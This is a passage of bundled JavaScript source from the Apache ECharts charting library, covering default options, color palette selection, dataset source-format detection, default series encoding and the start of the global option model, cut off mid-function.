http://blogs.adobe.com/webplatform/2014/02/24/using-blend-modes-in-html-canvas/\n    // https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation\n    // Default is source-over\n    blendMode: null,\n\n    animation: 'auto',\n    animationDuration: 1000,\n    animationDurationUpdate: 300,\n    animationEasing: 'exponentialOut',\n    animationEasingUpdate: 'cubicOut',\n\n    animationThreshold: 2000,\n    // Configuration for progressive/incremental rendering\n    progressiveThreshold: 3000,\n    progressive: 400,\n\n    // Threshold of if use single hover layer to optimize.\n    // It is recommended that `hoverLayerThreshold` is equivalent to or less than\n    // `progressiveThreshold`, otherwise hover will cause restart of progressive,\n    // which is unexpected.\n    // see example <echarts/test/heatmap-large.html>.\n    hoverLayerThreshold: 3000,\n\n    // See: module:echarts/scale/Time\n    useUTC: false\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\nvar inner$2 = makeInner();\n\nfunction getNearestColorPalette(colors, requestColorNum) {\n    var paletteNum = colors.length;\n    // TODO colors must be in order\n    for (var i = 0; i < paletteNum; i++) {\n        if (colors[i].length > requestColorNum) {\n            return colors[i];\n        }\n    }\n    return colors[paletteNum - 1];\n}\n\nvar colorPaletteMixin = {\n    clearColorPalette: function () {\n        inner$2(this).colorIdx = 0;\n        inner$2(this).colorNameMap = {};\n    },\n\n    /**\n     * @param {string} name MUST NOT be null/undefined. Otherwise call this function\n     *                 twise with the same parameters will get different result.\n     * @param {Object} [scope=this]\n     * @param {Object} [requestColorNum]\n     * @return {string} color string.\n     */\n    getColorFromPalette: function (name, scope, requestColorNum) {\n        scope = scope || this;\n        var scopeFields = inner$2(scope);\n        var colorIdx = scopeFields.colorIdx || 0;\n        var colorNameMap = scopeFields.colorNameMap = scopeFields.colorNameMap || {};\n        // Use `hasOwnProperty` to avoid conflict with Object.prototype.\n        if (colorNameMap.hasOwnProperty(name)) {\n            return colorNameMap[name];\n        }\n        var defaultColorPalette = normalizeToArray(this.get('color', true));\n        var layeredColorPalette = this.get('colorLayer', true);\n        var colorPalette = ((requestColorNum == null || !layeredColorPalette)\n            ? defaultColorPalette : getNearestColorPalette(layeredColorPalette, requestColorNum));\n\n        // In case can't find in layered color palette.\n        colorPalette = colorPalette || defaultColorPalette;\n\n        if (!colorPalette || !colorPalette.length) {\n            return;\n        }\n\n        var color = colorPalette[colorIdx];\n        if (name) {\n            colorNameMap[name] = color;\n        }\n        scopeFields.colorIdx = (colorIdx + 1) % colorPalette.length;\n\n        return color;\n    }\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Avoid typo.\nvar SOURCE_FORMAT_ORIGINAL = 'original';\nvar SOURCE_FORMAT_ARRAY_ROWS = 'arrayRows';\nvar SOURCE_FORMAT_OBJECT_ROWS = 'objectRows';\nvar SOURCE_FORMAT_KEYED_COLUMNS = 'keyedColumns';\nvar SOURCE_FORMAT_UNKNOWN = 'unknown';\n// ??? CHANGE A NAME\nvar SOURCE_FORMAT_TYPED_ARRAY = 'typedArray';\n\nvar SERIES_LAYOUT_BY_COLUMN = 'column';\nvar SERIES_LAYOUT_BY_ROW = 'row';\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * [sourceFormat]\n *\n * + \"original\":\n * This format is only used in series.data, where\n * itemStyle can be specified in data item.\n *\n * + \"arrayRows\":\n * [\n *     ['product', 'score', 'amount'],\n *     ['Matcha Latte', 89.3, 95.8],\n *     ['Milk Tea', 92.1, 89.4],\n *     ['Cheese Cocoa', 94.4, 91.2],\n *     ['Walnut Brownie', 85.4, 76.9]\n * ]\n *\n * + \"objectRows\":\n * [\n *     {product: 'Matcha Latte', score: 89.3, amount: 95.8},\n *     {product: 'Milk Tea', score: 92.1, amount: 89.4},\n *     {product: 'Cheese Cocoa', score: 94.4, amount: 91.2},\n *     {product: 'Walnut Brownie', score: 85.4, amount: 76.9}\n * ]\n *\n * + \"keyedColumns\":\n * {\n *     'product': ['Matcha Latte', 'Milk Tea', 'Cheese Cocoa', 'Walnut Brownie'],\n *     'count': [823, 235, 1042, 988],\n *     'score': [95.8, 81.4, 91.2, 76.9]\n * }\n *\n * + \"typedArray\"\n *\n * + \"unknown\"\n */\n\n/**\n * @constructor\n * @param {Object} fields\n * @param {string} fields.sourceFormat\n * @param {Array|Object} fields.fromDataset\n * @param {Array|Object} [fields.data]\n * @param {string} [seriesLayoutBy='column']\n * @param {Array.<Object|string>} [dimensionsDefine]\n * @param {Objet|HashMap} [encodeDefine]\n * @param {number} [startIndex=0]\n * @param {number} [dimensionsDetectCount]\n */\nfunction Source(fields) {\n\n    /**\n     * @type {boolean}\n     */\n    this.fromDataset = fields.fromDataset;\n\n    /**\n     * Not null/undefined.\n     * @type {Array|Object}\n     */\n    this.data = fields.data || (\n        fields.sourceFormat === SOURCE_FORMAT_KEYED_COLUMNS ? {} : []\n    );\n\n    /**\n     * See also \"detectSourceFormat\".\n     * Not null/undefined.\n     * @type {string}\n     */\n    this.sourceFormat = fields.sourceFormat || SOURCE_FORMAT_UNKNOWN;\n\n    /**\n     * 'row' or 'column'\n     * Not null/undefined.\n     * @type {string} seriesLayoutBy\n     */\n    this.seriesLayoutBy = fields.seriesLayoutBy || SERIES_LAYOUT_BY_COLUMN;\n\n    /**\n     * dimensions definition in option.\n     * can be null/undefined.\n     * @type {Array.<Object|string>}\n     */\n    this.dimensionsDefine = fields.dimensionsDefine;\n\n    /**\n     * encode definition in option.\n     * can be null/undefined.\n     * @type {Objet|HashMap}\n     */\n    this.encodeDefine = fields.encodeDefine && createHashMap(fields.encodeDefine);\n\n    /**\n     * Not null/undefined, uint.\n     * @type {number}\n     */\n    this.startIndex = fields.startIndex || 0;\n\n    /**\n     * Can be null/undefined (when unknown), uint.\n     * @type {number}\n     */\n    this.dimensionsDetectCount = fields.dimensionsDetectCount;\n}\n\n/**\n * Wrap original series data for some compatibility cases.\n */\nSource.seriesDataToSource = function (data) {\n    return new Source({\n        data: data,\n        sourceFormat: isTypedArray(data)\n            ? SOURCE_FORMAT_TYPED_ARRAY\n            : SOURCE_FORMAT_ORIGINAL,\n        fromDataset: false\n    });\n};\n\nenableClassCheck(Source);\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// The result of `guessOrdinal`.\nvar BE_ORDINAL = {\n    Must: 1, // Encounter string but not '-' and not number-like.\n    Might: 2, // Encounter string but number-like.\n    Not: 3 // Other cases\n};\n\nvar inner$3 = makeInner();\n\n/**\n * @see {module:echarts/data/Source}\n * @param {module:echarts/component/dataset/DatasetModel} datasetModel\n * @return {string} sourceFormat\n */\nfunction detectSourceFormat(datasetModel) {\n    var data = datasetModel.option.source;\n    var sourceFormat = SOURCE_FORMAT_UNKNOWN;\n\n    if (isTypedArray(data)) {\n        sourceFormat = SOURCE_FORMAT_TYPED_ARRAY;\n    }\n    else if (isArray(data)) {\n        // FIXME Whether tolerate null in top level array?\n        if (data.length === 0) {\n            sourceFormat = SOURCE_FORMAT_ARRAY_ROWS;\n        }\n\n        for (var i = 0, len = data.length; i < len; i++) {\n            var item = data[i];\n\n            if (item == null) {\n                continue;\n            }\n            else if (isArray(item)) {\n                sourceFormat = SOURCE_FORMAT_ARRAY_ROWS;\n                break;\n            }\n            else if (isObject$1(item)) {\n                sourceFormat = SOURCE_FORMAT_OBJECT_ROWS;\n                break;\n            }\n        }\n    }\n    else if (isObject$1(data)) {\n        for (var key in data) {\n            if (data.hasOwnProperty(key) && isArrayLike(data[key])) {\n                sourceFormat = SOURCE_FORMAT_KEYED_COLUMNS;\n                break;\n            }\n        }\n    }\n    else if (data != null) {\n        throw new Error('Invalid data');\n    }\n\n    inner$3(datasetModel).sourceFormat = sourceFormat;\n}\n\n/**\n * [Scenarios]:\n * (1) Provide source data directly:\n *     series: {\n *         encode: {...},\n *         dimensions: [...]\n *         seriesLayoutBy: 'row',\n *         data: [[...]]\n *     }\n * (2) Refer to datasetModel.\n *     series: [{\n *         encode: {...}\n *         // Ignore datasetIndex means `datasetIndex: 0`\n *         // and the dimensions defination in dataset is used\n *     }, {\n *         encode: {...},\n *         seriesLayoutBy: 'column',\n *         datasetIndex: 1\n *     }]\n *\n * Get data from series itself or datset.\n * @return {module:echarts/data/Source} source\n */\nfunction getSource(seriesModel) {\n    return inner$3(seriesModel).source;\n}\n\n/**\n * MUST be called before mergeOption of all series.\n * @param {module:echarts/model/Global} ecModel\n */\nfunction resetSourceDefaulter(ecModel) {\n    // `datasetMap` is used to make default encode.\n    inner$3(ecModel).datasetMap = createHashMap();\n}\n\n/**\n * [Caution]:\n * MUST be called after series option merged and\n * before \"series.getInitailData()\" called.\n *\n * [The rule of making default encode]:\n * Category axis (if exists) alway map to the first dimension.\n * Each other axis occupies a subsequent dimension.\n *\n * [Why make default encode]:\n * Simplify the typing of encode in option, avoiding the case like that:\n * series: [{encode: {x: 0, y: 1}}, {encode: {x: 0, y: 2}}, {encode: {x: 0, y: 3}}],\n * where the \"y\" have to be manually typed as \"1, 2, 3, ...\".\n *\n * @param {module:echarts/model/Series} seriesModel\n */\nfunction prepareSource(seriesModel) {\n    var seriesOption = seriesModel.option;\n\n    var data = seriesOption.data;\n    var sourceFormat = isTypedArray(data)\n        ? SOURCE_FORMAT_TYPED_ARRAY : SOURCE_FORMAT_ORIGINAL;\n    var fromDataset = false;\n\n    var seriesLayoutBy = seriesOption.seriesLayoutBy;\n    var sourceHeader = seriesOption.sourceHeader;\n    var dimensionsDefine = seriesOption.dimensions;\n\n    var datasetModel = getDatasetModel(seriesModel);\n    if (datasetModel) {\n        var datasetOption = datasetModel.option;\n\n        data = datasetOption.source;\n        sourceFormat = inner$3(datasetModel).sourceFormat;\n        fromDataset = true;\n\n        // These settings from series has higher priority.\n        seriesLayoutBy = seriesLayoutBy || datasetOption.seriesLayoutBy;\n        sourceHeader == null && (sourceHeader = datasetOption.sourceHeader);\n        dimensionsDefine = dimensionsDefine || datasetOption.dimensions;\n    }\n\n    var completeResult = completeBySourceData(\n        data, sourceFormat, seriesLayoutBy, sourceHeader, dimensionsDefine\n    );\n\n    inner$3(seriesModel).source = new Source({\n        data: data,\n        fromDataset: fromDataset,\n        seriesLayoutBy: seriesLayoutBy,\n        sourceFormat: sourceFormat,\n        dimensionsDefine: completeResult.dimensionsDefine,\n        startIndex: completeResult.startIndex,\n        dimensionsDetectCount: completeResult.dimensionsDetectCount,\n        // Note: dataset option does not have `encode`.\n        encodeDefine: seriesOption.encode\n    });\n}\n\n// return {startIndex, dimensionsDefine, dimensionsCount}\nfunction completeBySourceData(data, sourceFormat, seriesLayoutBy, sourceHeader, dimensionsDefine) {\n    if (!data) {\n        return {dimensionsDefine: normalizeDimensionsDefine(dimensionsDefine)};\n    }\n\n    var dimensionsDetectCount;\n    var startIndex;\n\n    if (sourceFormat === SOURCE_FORMAT_ARRAY_ROWS) {\n        // Rule: Most of the first line are string: it is header.\n        // Caution: consider a line with 5 string and 1 number,\n        // it still can not be sure it is a head, because the\n        // 5 string may be 5 values of category columns.\n        if (sourceHeader === 'auto' || sourceHeader == null) {\n            arrayRowsTravelFirst(function (val) {\n                // '-' is regarded as null/undefined.\n                if (val != null && val !== '-') {\n                    if (isString(val)) {\n                        startIndex == null && (startIndex = 1);\n                    }\n                    else {\n                        startIndex = 0;\n                    }\n                }\n            // 10 is an experience number, avoid long loop.\n            }, seriesLayoutBy, data, 10);\n        }\n        else {\n            startIndex = sourceHeader ? 1 : 0;\n        }\n\n        if (!dimensionsDefine && startIndex === 1) {\n            dimensionsDefine = [];\n            arrayRowsTravelFirst(function (val, index) {\n                dimensionsDefine[index] = val != null ? val : '';\n            }, seriesLayoutBy, data);\n        }\n\n        dimensionsDetectCount = dimensionsDefine\n            ? dimensionsDefine.length\n            : seriesLayoutBy === SERIES_LAYOUT_BY_ROW\n            ? data.length\n            : data[0]\n            ? data[0].length\n            : null;\n    }\n    else if (sourceFormat === SOURCE_FORMAT_OBJECT_ROWS) {\n        if (!dimensionsDefine) {\n            dimensionsDefine = objectRowsCollectDimensions(data);\n        }\n    }\n    else if (sourceFormat === SOURCE_FORMAT_KEYED_COLUMNS) {\n        if (!dimensionsDefine) {\n            dimensionsDefine = [];\n            each$1(data, function (colArr, key) {\n                dimensionsDefine.push(key);\n            });\n        }\n    }\n    else if (sourceFormat === SOURCE_FORMAT_ORIGINAL) {\n        var value0 = getDataItemValue(data[0]);\n        dimensionsDetectCount = isArray(value0) && value0.length || 1;\n    }\n    else if (sourceFormat === SOURCE_FORMAT_TYPED_ARRAY) {\n        if (__DEV__) {\n            assert$1(!!dimensionsDefine, 'dimensions must be given if data is TypedArray.');\n        }\n    }\n\n    return {\n        startIndex: startIndex,\n        dimensionsDefine: normalizeDimensionsDefine(dimensionsDefine),\n        dimensionsDetectCount: dimensionsDetectCount\n    };\n}\n\n// Consider dimensions defined like ['A', 'price', 'B', 'price', 'C', 'price'],\n// which is reasonable. But dimension name is duplicated.\n// Returns undefined or an array contains only object without null/undefiend or string.\nfunction normalizeDimensionsDefine(dimensionsDefine) {\n    if (!dimensionsDefine) {\n        // The meaning of null/undefined is different from empty array.\n        return;\n    }\n    var nameMap = createHashMap();\n    return map(dimensionsDefine, function (item, index) {\n        item = extend({}, isObject$1(item) ? item : {name: item});\n\n        // User can set null in dimensions.\n        // We dont auto specify name, othewise a given name may\n        // cause it be refered unexpectedly.\n        if (item.name == null) {\n            return item;\n        }\n\n        // Also consider number form like 2012.\n        item.name += '';\n        // User may also specify displayName.\n        // displayName will always exists except user not\n        // specified or dim name is not specified or detected.\n        // (A auto generated dim name will not be used as\n        // displayName).\n        if (item.displayName == null) {\n            item.displayName = item.name;\n        }\n\n        var exist = nameMap.get(item.name);\n        if (!exist) {\n            nameMap.set(item.name, {count: 1});\n        }\n        else {\n            item.name += '-' + exist.count++;\n        }\n\n        return item;\n    });\n}\n\nfunction arrayRowsTravelFirst(cb, seriesLayoutBy, data, maxLoop) {\n    maxLoop == null && (maxLoop = Infinity);\n    if (seriesLayoutBy === SERIES_LAYOUT_BY_ROW) {\n        for (var i = 0; i < data.length && i < maxLoop; i++) {\n            cb(data[i] ? data[i][0] : null, i);\n        }\n    }\n    else {\n        var value0 = data[0] || [];\n        for (var i = 0; i < value0.length && i < maxLoop; i++) {\n            cb(value0[i], i);\n        }\n    }\n}\n\nfunction objectRowsCollectDimensions(data) {\n    var firstIndex = 0;\n    var obj;\n    while (firstIndex < data.length && !(obj = data[firstIndex++])) {} // jshint ignore: line\n    if (obj) {\n        var dimensions = [];\n        each$1(obj, function (value, key) {\n            dimensions.push(key);\n        });\n        return dimensions;\n    }\n}\n\n/**\n * [The strategy of the arrengment of data dimensions for dataset]:\n * \"value way\": all axes are non-category axes. So series one by one take\n *     several (the number is coordSysDims.length) dimensions from dataset.\n *     The result of data arrengment of data dimensions like:\n *     | ser0_x | ser0_y | ser1_x | ser1_y | ser2_x | ser2_y |\n * \"category way\": at least one axis is category axis. So the the first data\n *     dimension is always mapped to the first category axis and shared by\n *     all of the series. The other data dimensions are taken by series like\n *     \"value way\" does.\n *     The result of data arrengment of data dimensions like:\n *     | ser_shared_x | ser0_y | ser1_y | ser2_y |\n *\n * @param {Array.<Object|string>} coordDimensions [{name: <string>, type: <string>, dimsDef: <Array>}, ...]\n * @param {module:model/Series} seriesModel\n * @param {module:data/Source} source\n * @return {Object} encode Never be `null/undefined`.\n */\nfunction makeSeriesEncodeForAxisCoordSys(coordDimensions, seriesModel, source) {\n    var encode = {};\n\n    var datasetModel = getDatasetModel(seriesModel);\n    // Currently only make default when using dataset, util more reqirements occur.\n    if (!datasetModel || !coordDimensions) {\n        return encode;\n    }\n\n    var encodeItemName = [];\n    var encodeSeriesName = [];\n\n    var ecModel = seriesModel.ecModel;\n    var datasetMap = inner$3(ecModel).datasetMap;\n    var key = datasetModel.uid + '_' + source.seriesLayoutBy;\n\n    var baseCategoryDimIndex;\n    var categoryWayValueDimStart;\n    coordDimensions = coordDimensions.slice();\n    each$1(coordDimensions, function (coordDimInfo, coordDimIdx) {\n        !isObject$1(coordDimInfo) && (coordDimensions[coordDimIdx] = {name: coordDimInfo});\n        if (coordDimInfo.type === 'ordinal' && baseCategoryDimIndex == null) {\n            baseCategoryDimIndex = coordDimIdx;\n            categoryWayValueDimStart = getDataDimCountOnCoordDim(coordDimensions[coordDimIdx]);\n        }\n        encode[coordDimInfo.name] = [];\n    });\n\n    var datasetRecord = datasetMap.get(key)\n        || datasetMap.set(key, {categoryWayDim: categoryWayValueDimStart, valueWayDim: 0});\n\n    // TODO\n    // Auto detect first time axis and do arrangement.\n    each$1(coordDimensions, function (coordDimInfo, coordDimIdx) {\n        var coordDimName = coordDimInfo.name;\n        var count = getDataDimCountOnCoordDim(coordDimInfo);\n\n        // In value way.\n        if (baseCategoryDimIndex == null) {\n            var start = datasetRecord.valueWayDim;\n            pushDim(encode[coordDimName], start, count);\n            pushDim(encodeSeriesName, start, count);\n            datasetRecord.valueWayDim += count;\n\n            // ??? TODO give a better default series name rule?\n            // especially when encode x y specified.\n            // consider: when mutiple series share one dimension\n            // category axis, series name should better use\n            // the other dimsion name. On the other hand, use\n            // both dimensions name.\n        }\n        // In category way, the first category axis.\n        else if (baseCategoryDimIndex === coordDimIdx) {\n            pushDim(encode[coordDimName], 0, count);\n            pushDim(encodeItemName, 0, count);\n        }\n        // In category way, the other axis.\n        else {\n            var start = datasetRecord.categoryWayDim;\n            pushDim(encode[coordDimName], start, count);\n            pushDim(encodeSeriesName, start, count);\n            datasetRecord.categoryWayDim += count;\n        }\n    });\n\n    function pushDim(dimIdxArr, idxFrom, idxCount) {\n        for (var i = 0; i < idxCount; i++) {\n            dimIdxArr.push(idxFrom + i);\n        }\n    }\n\n    function getDataDimCountOnCoordDim(coordDimInfo) {\n        var dimsDef = coordDimInfo.dimsDef;\n        return dimsDef ? dimsDef.length : 1;\n    }\n\n    encodeItemName.length && (encode.itemName = encodeItemName);\n    encodeSeriesName.length && (encode.seriesName = encodeSeriesName);\n\n    return encode;\n}\n\n/**\n * Work for data like [{name: ..., value: ...}, ...].\n *\n * @param {module:model/Series} seriesModel\n * @param {module:data/Source} source\n * @return {Object} encode Never be `null/undefined`.\n */\nfunction makeSeriesEncodeForNameBased(seriesModel, source, dimCount) {\n    var encode = {};\n\n    var datasetModel = getDatasetModel(seriesModel);\n    // Currently only make default when using dataset, util more reqirements occur.\n    if (!datasetModel) {\n        return encode;\n    }\n\n    var sourceFormat = source.sourceFormat;\n    var dimensionsDefine = source.dimensionsDefine;\n\n    var potentialNameDimIndex;\n    if (sourceFormat === SOURCE_FORMAT_OBJECT_ROWS || sourceFormat === SOURCE_FORMAT_KEYED_COLUMNS) {\n        each$1(dimensionsDefine, function (dim, idx) {\n            if ((isObject$1(dim) ? dim.name : dim) === 'name') {\n                potentialNameDimIndex = idx;\n            }\n        });\n    }\n\n    // idxResult: {v, n}.\n    var idxResult = (function () {\n\n        var idxRes0 = {};\n        var idxRes1 = {};\n        var guessRecords = [];\n\n        // 5 is an experience value.\n        for (var i = 0, len = Math.min(5, dimCount); i < len; i++) {\n            var guessResult = doGuessOrdinal(\n                source.data, sourceFormat, source.seriesLayoutBy,\n                dimensionsDefine, source.startIndex, i\n            );\n            guessRecords.push(guessResult);\n            var isPureNumber = guessResult === BE_ORDINAL.Not;\n\n            // [Strategy of idxRes0]: find the first BE_ORDINAL.Not as the value dim,\n            // and then find a name dim with the priority:\n            // \"BE_ORDINAL.Might|BE_ORDINAL.Must\" > \"other dim\" > \"the value dim itself\".\n            if (isPureNumber && idxRes0.v == null && i !== potentialNameDimIndex) {\n                idxRes0.v = i;\n            }\n            if (idxRes0.n == null\n                || (idxRes0.n === idxRes0.v)\n                || (!isPureNumber && guessRecords[idxRes0.n] === BE_ORDINAL.Not)\n            ) {\n                idxRes0.n = i;\n            }\n            if (fulfilled(idxRes0) && guessRecords[idxRes0.n] !== BE_ORDINAL.Not) {\n                return idxRes0;\n            }\n\n            // [Strategy of idxRes1]: if idxRes0 not satisfied (that is, no BE_ORDINAL.Not),\n            // find the first BE_ORDINAL.Might as the value dim,\n            // and then find a name dim with the priority:\n            // \"other dim\" > \"the value dim itself\".\n            // That is for backward compat: number-like (e.g., `'3'`, `'55'`) can be\n            // treated as number.\n            if (!isPureNumber) {\n                if (guessResult === BE_ORDINAL.Might && idxRes1.v == null && i !== potentialNameDimIndex) {\n                    idxRes1.v = i;\n                }\n                if (idxRes1.n == null || (idxRes1.n === idxRes1.v)) {\n                    idxRes1.n = i;\n                }\n            }\n        }\n\n        function fulfilled(idxResult) {\n            return idxResult.v != null && idxResult.n != null;\n        }\n\n        return fulfilled(idxRes0) ? idxRes0 : fulfilled(idxRes1) ? idxRes1 : null;\n    })();\n\n    if (idxResult) {\n        encode.value = idxResult.v;\n        // `potentialNameDimIndex` has highest priority.\n        var nameDimIndex = potentialNameDimIndex != null ? potentialNameDimIndex : idxResult.n;\n        // By default, label use itemName in charts.\n        // So we dont set encodeLabel here.\n        encode.itemName = [nameDimIndex];\n        encode.seriesName = [nameDimIndex];\n    }\n\n    return encode;\n}\n\n/**\n * If return null/undefined, indicate that should not use datasetModel.\n */\nfunction getDatasetModel(seriesModel) {\n    var option = seriesModel.option;\n    // Caution: consider the scenario:\n    // A dataset is declared and a series is not expected to use the dataset,\n    // and at the beginning `setOption({series: { noData })` (just prepare other\n    // option but no data), then `setOption({series: {data: [...]}); In this case,\n    // the user should set an empty array to avoid that dataset is used by default.\n    var thisData = option.data;\n    if (!thisData) {\n        return seriesModel.ecModel.getComponent('dataset', option.datasetIndex || 0);\n    }\n}\n\n/**\n * The rule should not be complex, otherwise user might not\n * be able to known where the data is wrong.\n * The code is ugly, but how to make it neat?\n *\n * @param {module:echars/data/Source} source\n * @param {number} dimIndex\n * @return {BE_ORDINAL} guess result.\n */\nfunction guessOrdinal(source, dimIndex) {\n    return doGuessOrdinal(\n        source.data,\n        source.sourceFormat,\n        source.seriesLayoutBy,\n        source.dimensionsDefine,\n        source.startIndex,\n        dimIndex\n    );\n}\n\n// dimIndex may be overflow source data.\n// return {BE_ORDINAL}\nfunction doGuessOrdinal(\n    data, sourceFormat, seriesLayoutBy, dimensionsDefine, startIndex, dimIndex\n) {\n    var result;\n    // Experience value.\n    var maxLoop = 5;\n\n    if (isTypedArray(data)) {\n        return BE_ORDINAL.Not;\n    }\n\n    // When sourceType is 'objectRows' or 'keyedColumns', dimensionsDefine\n    // always exists in source.\n    var dimName;\n    var dimType;\n    if (dimensionsDefine) {\n        var dimDefItem = dimensionsDefine[dimIndex];\n        if (isObject$1(dimDefItem)) {\n            dimName = dimDefItem.name;\n            dimType = dimDefItem.type;\n        }\n        else if (isString(dimDefItem)) {\n            dimName = dimDefItem;\n        }\n    }\n\n    if (dimType != null) {\n        return dimType === 'ordinal' ? BE_ORDINAL.Must : BE_ORDINAL.Not;\n    }\n\n    if (sourceFormat === SOURCE_FORMAT_ARRAY_ROWS) {\n        if (seriesLayoutBy === SERIES_LAYOUT_BY_ROW) {\n            var sample = data[dimIndex];\n            for (var i = 0; i < (sample || []).length && i < maxLoop; i++) {\n                if ((result = detectValue(sample[startIndex + i])) != null) {\n                    return result;\n                }\n            }\n        }\n        else {\n            for (var i = 0; i < data.length && i < maxLoop; i++) {\n                var row = data[startIndex + i];\n                if (row && (result = detectValue(row[dimIndex])) != null) {\n                    return result;\n                }\n            }\n        }\n    }\n    else if (sourceFormat === SOURCE_FORMAT_OBJECT_ROWS) {\n        if (!dimName) {\n            return BE_ORDINAL.Not;\n        }\n        for (var i = 0; i < data.length && i < maxLoop; i++) {\n            var item = data[i];\n            if (item && (result = detectValue(item[dimName])) != null) {\n                return result;\n            }\n        }\n    }\n    else if (sourceFormat === SOURCE_FORMAT_KEYED_COLUMNS) {\n        if (!dimName) {\n            return BE_ORDINAL.Not;\n        }\n        var sample = data[dimName];\n        if (!sample || isTypedArray(sample)) {\n            return BE_ORDINAL.Not;\n        }\n        for (var i = 0; i < sample.length && i < maxLoop; i++) {\n            if ((result = detectValue(sample[i])) != null) {\n                return result;\n            }\n        }\n    }\n    else if (sourceFormat === SOURCE_FORMAT_ORIGINAL) {\n        for (var i = 0; i < data.length && i < maxLoop; i++) {\n            var item = data[i];\n            var val = getDataItemValue(item);\n            if (!isArray(val)) {\n                return BE_ORDINAL.Not;\n            }\n            if ((result = detectValue(val[dimIndex])) != null) {\n                return result;\n            }\n        }\n    }\n\n    function detectValue(val) {\n        var beStr = isString(val);\n        // Consider usage convenience, '1', '2' will be treated as \"number\".\n        // `isFinit('')` get `true`.\n        if (val != null && isFinite(val) && val !== '') {\n            return beStr ? BE_ORDINAL.Might : BE_ORDINAL.Not;\n        }\n        else if (beStr && val !== '-') {\n            return BE_ORDINAL.Must;\n        }\n    }\n\n    return BE_ORDINAL.Not;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * ECharts global model\n *\n * @module {echarts/model/Global}\n */\n\n\n/**\n * Caution: If the mechanism should be changed some day, these cases\n * should be considered:\n *\n * (1) In `merge option` mode, if using the same option to call `setOption`\n * many times, the result should be the same (try our best to ensure that).\n * (2) In `merge option` mode, if a component has no id/name specified, it\n * will be merged by index, and the result sequence of the components is\n * consistent to the original sequence.\n * (3) `reset` feature (in toolbox). Find detailed info in comments about\n * `mergeOption` in module:echarts/model/OptionManager.\n */\n\nvar OPTION_INNER_KEY = '\\0_ec_inner';\n\n/**\n * @alias module:echarts/model/Global\n *\n * @param {Object} option\n * @param {module:echarts/model/Model} parentModel\n * @param {Object} theme\n */\nvar GlobalModel = Model.extend({\n\n    init: function (option, parentModel, theme, optionManager) {\n        theme = theme || {};\n\n        this.option = null; // Mark as not initialized.\n\n        /**\n         * @type {module:echarts/model/Model}\n         * @private\n         */\n        this._theme = new Model(theme);\n\n        /**\n         * @type {module:echarts/model/OptionManager}\n         */\n        this._optionManager = optionManager;\n    },\n\n    setOption: function (option, optionPreprocessorFuncs) {\n        assert$1(\n            !(OPTION_INNER_KEY in option),\n            'please use chart.getOption()'\n        );\n\n        this._optionManager.setOption(option, optionPreprocessorFuncs);\n\n        this.resetOption(null);\n    },\n\n    /**\n     * @param {string} type null/undefined: reset all.\n     *                      'recreate': force recreate all.\n     *                      'timeline': only reset timeline option\n     *                      'media': only reset media query option\n     * @return {boolean} Whether option changed.\n     */\n    resetOption: function (type) {\n        var optionChanged = false;\n        var optionManager = this._optionManager;\n\n        if (!type || type === 'recreate') {\n            var baseOption = optionManager.mountOption(type === 'recreate');\n\n            if (!this.option || type === 'recreate') {\n                initBase.call(this, baseOption);\n            }\n            else {\n                this.restoreData();\n                this.mergeOption(baseOption);\n            }\n            optionChanged = true;\n        }\n\n        if (type === 'timeline' || type === 'media') {\n            this.restoreData();\n        }\n\n        if (!type || type === 'recreate' || type === 'timeline') {\n            var timelineOption = optionManager.getTimelineOption(this);\n            timelineOption && (this.mergeOption(timelineOption), optionChanged = true);\n        }\n\n        if (!type || type 